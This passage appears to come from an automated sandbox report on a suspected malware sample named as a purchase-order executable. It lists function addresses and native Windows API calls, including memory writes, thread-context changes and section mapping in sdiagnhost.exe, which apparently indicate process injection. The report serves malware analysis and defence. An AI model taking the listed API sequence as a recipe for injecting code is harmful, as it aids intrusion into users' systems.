                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01763D10 NtOpenProcessToken,6_2_01763D10
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04414650 NtSuspendThread,LdrInitializeThunk,9_2_04414650
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04414340 NtSetContextThread,LdrInitializeThunk,9_2_04414340
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412C60 NtCreateKey,LdrInitializeThunk,9_2_04412C60
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_04412C70
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_04412CA0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412D10 NtMapViewOfSection,LdrInitializeThunk,9_2_04412D10
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_04412D30
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412DD0 NtDelayExecution,LdrInitializeThunk,9_2_04412DD0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_04412DF0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412EE0 NtQueueApcThread,LdrInitializeThunk,9_2_04412EE0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_04412E80
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412F30 NtCreateSection,LdrInitializeThunk,9_2_04412F30
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412FE0 NtCreateFile,LdrInitializeThunk,9_2_04412FE0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412FB0 NtResumeThread,LdrInitializeThunk,9_2_04412FB0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412AD0 NtReadFile,LdrInitializeThunk,9_2_04412AD0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412AF0 NtWriteFile,LdrInitializeThunk,9_2_04412AF0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412B60 NtClose,LdrInitializeThunk,9_2_04412B60
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412BE0 NtQueryValueKey,LdrInitializeThunk,9_2_04412BE0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_04412BF0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_04412BA0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044135C0 NtCreateMutant,LdrInitializeThunk,9_2_044135C0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044139B0 NtGetContextThread,LdrInitializeThunk,9_2_044139B0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412C00 NtQueryInformationProcess,9_2_04412C00
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412CC0 NtQueryVirtualMemory,9_2_04412CC0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412CF0 NtOpenProcess,9_2_04412CF0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412D00 NtSetInformationFile,9_2_04412D00
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412DB0 NtEnumerateKey,9_2_04412DB0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412E30 NtWriteVirtualMemory,9_2_04412E30
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412EA0 NtAdjustPrivilegesToken,9_2_04412EA0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412F60 NtCreateProcessEx,9_2_04412F60
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412F90 NtProtectVirtualMemory,9_2_04412F90
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412FA0 NtQuerySection,9_2_04412FA0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412AB0 NtWaitForSingleObject,9_2_04412AB0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04412B80 NtQueryInformationFile,9_2_04412B80
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04413010 NtOpenDirectoryObject,9_2_04413010
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04413090 NtSetValueKey,9_2_04413090
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04413D70 NtOpenThread,9_2_04413D70
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04413D10 NtOpenProcessToken,9_2_04413D10
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001D90A0 NtCreateFile,9_2_001D90A0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001D9200 NtReadFile,9_2_001D9200
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001D92F0 NtDeleteFile,9_2_001D92F0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001D9390 NtClose,9_2_001D9390
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001D94F0 NtAllocateVirtualMemory,9_2_001D94F0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0424F733 NtMapViewOfSection,9_2_0424F733
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0424FA52 NtResumeThread,9_2_0424FA52
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_0158EEA40_2_0158EEA4
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_054E72D80_2_054E72D8
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_054E00400_2_054E0040
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_054E00060_2_054E0006
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_054FCCF60_2_054FCCF6
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_054FD8280_2_054FD828
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_054F9BE80_2_054F9BE8
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_074816C30_2_074816C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_074816F80_2_074816F8
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_0748A2B80_2_0748A2B8
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_07489E800_2_07489E80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_0748BD980_2_0748BD98
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_07489A480_2_07489A48
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_0748B9500_2_0748B950
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_0748B9600_2_0748B960
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_0AD500400_2_0AD50040
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_004188D36_2_004188D3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_004030E06_2_004030E0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0041028E6_2_0041028E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_004102936_2_00410293
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_00416B136_2_00416B13
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_004023F46_2_004023F4
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_004024006_2_00402400
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0042EC936_2_0042EC93
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_004104B36_2_004104B3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0040E5336_2_0040E533
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_004025AA6_2_004025AA
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_004025B06_2_004025B0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B81586_2_017B8158
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CA1186_2_017CA118
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017201006_2_01720100
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E81CC6_2_017E81CC
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F01AA6_2_017F01AA
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C20006_2_017C2000
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EA3526_2_017EA352
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173E3F06_2_0173E3F0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F03E66_2_017F03E6
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D02746_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B02C06_2_017B02C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017305356_2_01730535
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F05916_2_017F0591
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E24466_2_017E2446
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D44206_2_017D4420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017DE4F66_2_017DE4F6
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017307706_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017547506_2_01754750
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172C7C06_2_0172C7C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174C6E06_2_0174C6E0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017469626_2_01746962
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017329A06_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017FA9A66_2_017FA9A6
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173A8406_2_0173A840
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017328406_2_01732840
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E8F06_2_0175E8F0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017168B86_2_017168B8
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EAB406_2_017EAB40
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E6BD76_2_017E6BD7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172EA806_2_0172EA80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CCD1F6_2_017CCD1F
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173AD006_2_0173AD00
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172ADE06_2_0172ADE0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01748DBF6_2_01748DBF
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730C006_2_01730C00
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01720CF26_2_01720CF2
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0CB56_2_017D0CB5
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A4F406_2_017A4F40
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01750F306_2_01750F30
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D2F306_2_017D2F30
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01772F286_2_01772F28
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173CFE06_2_0173CFE0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01722FC86_2_01722FC8
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AEFA06_2_017AEFA0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730E596_2_01730E59
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EEE266_2_017EEE26
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EEEDB6_2_017EEEDB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01742E906_2_01742E90
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017ECE936_2_017ECE93
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171F1726_2_0171F172
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017FB16B6_2_017FB16B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0176516C6_2_0176516C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173B1B06_2_0173B1B0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E70E96_2_017E70E9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EF0E06_2_017EF0E0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017DF0CC6_2_017DF0CC
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017370C06_2_017370C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171D34C6_2_0171D34C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E132D6_2_017E132D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0177739A6_2_0177739A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D12ED6_2_017D12ED
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174B2C06_2_0174B2C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017352A06_2_017352A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E75716_2_017E7571
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CD5B06_2_017CD5B0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017214606_2_01721460
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EF43F6_2_017EF43F
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EF7B06_2_017EF7B0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E16CC6_2_017E16CC
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017399506_2_01739950
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174B9506_2_0174B950
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C59106_2_017C5910
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179D8006_2_0179D800
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017338E06_2_017338E0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EFB766_2_017EFB76
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A5BF06_2_017A5BF0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0176DBF96_2_0176DBF9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174FB806_2_0174FB80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A3A6C6_2_017A3A6C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EFA496_2_017EFA49
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E7A466_2_017E7A46
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017DDAC66_2_017DDAC6
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CDAAC6_2_017CDAAC
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01775AA06_2_01775AA0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D1AA36_2_017D1AA3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E7D736_2_017E7D73
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E1D5A6_2_017E1D5A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01733D406_2_01733D40
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174FDC06_2_0174FDC0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A9C326_2_017A9C32
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EFCF26_2_017EFCF2
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EFF096_2_017EFF09
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_016F3FD56_2_016F3FD5
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_016F3FD26_2_016F3FD2
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EFFB16_2_017EFFB1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01731F926_2_01731F92
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01739EB06_2_01739EB0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044924469_2_04492446
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044844209_2_04484420
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0448E4F69_2_0448E4F6
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E05359_2_043E0535
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044A05919_2_044A0591
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043FC6E09_2_043FC6E0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044047509_2_04404750
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E07709_2_043E0770
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043DC7C09_2_043DC7C0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044720009_2_04472000
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044681589_2_04468158
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043D01009_2_043D0100
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0447A1189_2_0447A118
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044981CC9_2_044981CC
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044A01AA9_2_044A01AA
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044941A29_2_044941A2
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044802749_2_04480274
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044602C09_2_044602C0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449A3529_2_0449A352
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044A03E69_2_044A03E6
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043EE3F09_2_043EE3F0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E0C009_2_043E0C00
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043D0CF29_2_043D0CF2
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04480CB59_2_04480CB5
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043EAD009_2_043EAD00
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0447CD1F9_2_0447CD1F
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043F8DBF9_2_043F8DBF
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043DADE09_2_043DADE0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E0E599_2_043E0E59
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449EE269_2_0449EE26
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449EEDB9_2_0449EEDB
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043F2E909_2_043F2E90
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449CE939_2_0449CE93
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04454F409_2_04454F40
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04422F289_2_04422F28
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04400F309_2_04400F30
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04482F309_2_04482F30
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043ECFE09_2_043ECFE0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0445EFA09_2_0445EFA0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043D2FC89_2_043D2FC8
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043EA8409_2_043EA840
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E28409_2_043E2840
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043C68B89_2_043C68B8
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0440E8F09_2_0440E8F0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043F69629_2_043F6962
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E29A09_2_043E29A0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044AA9A69_2_044AA9A6
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043DEA809_2_043DEA80
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449AB409_2_0449AB40
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04496BD79_2_04496BD7
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043D14609_2_043D1460
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449F43F9_2_0449F43F
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044975719_2_04497571
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0447D5B09_2_0447D5B0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044916CC9_2_044916CC
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449F7B09_2_0449F7B0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0448F0CC9_2_0448F0CC
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044970E99_2_044970E9
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449F0E09_2_0449F0E0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E70C09_2_043E70C0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044AB16B9_2_044AB16B
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0441516C9_2_0441516C
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043CF1729_2_043CF172
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043EB1B09_2_043EB1B0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E52A09_2_043E52A0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044812ED9_2_044812ED
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043FB2C09_2_043FB2C0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449132D9_2_0449132D
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043CD34C9_2_043CD34C
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0442739A9_2_0442739A
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04459C329_2_04459C32
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449FCF29_2_0449FCF2
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04491D5A9_2_04491D5A
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04497D739_2_04497D73
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E3D409_2_043E3D40
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043FFDC09_2_043FFDC0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E9EB09_2_043E9EB0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449FF099_2_0449FF09
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E1F929_2_043E1F92
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449FFB19_2_0449FFB1
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0444D8009_2_0444D800
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E38E09_2_043E38E0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044759109_2_04475910
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E99509_2_043E9950
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043FB9509_2_043FB950
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449FA499_2_0449FA49
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04497A469_2_04497A46
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04453A6C9_2_04453A6C
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0448DAC69_2_0448DAC6
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04425AA09_2_04425AA0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0447DAAC9_2_0447DAAC
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04481AA39_2_04481AA3
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449FB769_2_0449FB76
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04455BF09_2_04455BF0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0441DBF99_2_0441DBF9
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043FFB809_2_043FFB80
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001C1F809_2_001C1F80
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001BCF309_2_001BCF30
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001BCF2B9_2_001BCF2B
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001BD1509_2_001BD150
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001BB1D09_2_001BB1D0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001C55709_2_001C5570
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001C37B09_2_001C37B0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001DB9309_2_001DB930
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_042534799_2_04253479
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0424E71C9_2_0424E71C
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0424D7E89_2_0424D7E8
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0424E2689_2_0424E268
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0424E3839_2_0424E383
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0424CA939_2_0424CA93
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: String function: 0445F290 appears 105 times
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: String function: 043CB970 appears 280 times
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: String function: 04427E54 appears 102 times
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: String function: 04415130 appears 58 times
